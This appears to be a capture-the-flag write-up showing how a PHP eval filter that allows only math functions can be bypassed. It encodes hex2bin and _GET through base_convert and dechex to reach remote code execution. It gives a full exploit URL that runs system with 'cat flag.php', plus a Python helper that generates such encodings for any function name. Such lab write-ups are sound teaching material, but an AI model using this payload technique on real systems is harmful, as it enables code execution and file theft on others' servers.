    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("Please do not enter strange functions");
        }
    }
    //Help you figure out the answer
    eval('echo '.$content.';');
}
```

The first thing we want to construct is system("cat /f*");

Then, because only mathematical functions are in the whitelist, we try to construct c=$_GET[a]($_GET[b]) to achieve RCE.

First construct _GET. Because mathematical functions are allowed, we use hex2bin to express _GET in hexadecimal:

_GET=hex2bin(5f474554)

But hex2bin is not among the given functions. So we keep looking for an available function that can produce hex2bin through encoding and decoding, and we see base_convert, which can do a base conversion.

Among the base conversions, only base 36 loses nothing in transcoding, because its digit set 0-9a-z covers every character of the function name. So we use base_convert(…,10,36):

payload: base_convert(37907361743,10,36)(5f474554) → hex2bin(5f474554) → _GET

Because 5f474554 cannot pass the check directly, we also need a function: dechex(1598506324)=5f474554

payload: `?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi($$pi);&max=system&min=cat flag.php`
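To check the two constants in this derivation, here is an added Python helper (not from the write-up) that derives the base-36 decimal for any lowercase alphanumeric function name and the dechex() argument for any short ASCII string; the function names are my own.

```python
DIGITS36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def base36_encode(n: int) -> str:
    """Integer -> lowercase base-36 string, i.e. what base_convert($n, 10, 36) returns."""
    if n < 0:
        raise ValueError("only non-negative values are handled here")
    out = ""
    while True:
        n, r = divmod(n, 36)
        out = DIGITS36[r] + out
        if n == 0:
            return out


def base36_decimal_for(name: str) -> int:
    """The decimal literal whose base-36 form spells `name`.

    Only characters from 0-9a-z can be spelled this way, which is why _GET
    itself (with its underscore) has to go through hex2bin instead."""
    if not name or not all(ch in DIGITS36 for ch in name):
        raise ValueError(f"{name!r} cannot be spelled in base 36")
    value = int(name, 36)
    assert base36_encode(value) == name   # the round trip the write-up relies on
    return value


def dechex_argument_for(text: str) -> int:
    """The integer whose dechex() output is the hex encoding of `text`,
    so that hex2bin(dechex(value)) yields `text` again. Note that a leading
    byte below 0x10 would lose its leading zero in dechex()."""
    return int(text.encode("ascii").hex(), 16)


def whitelist_spelling(func_name: str, target: str) -> str:
    """Spell func_name(target) using only base_convert and dechex."""
    n = base36_decimal_for(func_name)
    h = dechex_argument_for(target)
    return f"base_convert({n},10,36)(dechex({h}))"


if __name__ == "__main__":
    # Reproduces the constants used in the web 124 payload above.
    print(whitelist_spelling("hex2bin", "_GET"))
```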


4 October 2021, 20:28 | Views: 4656
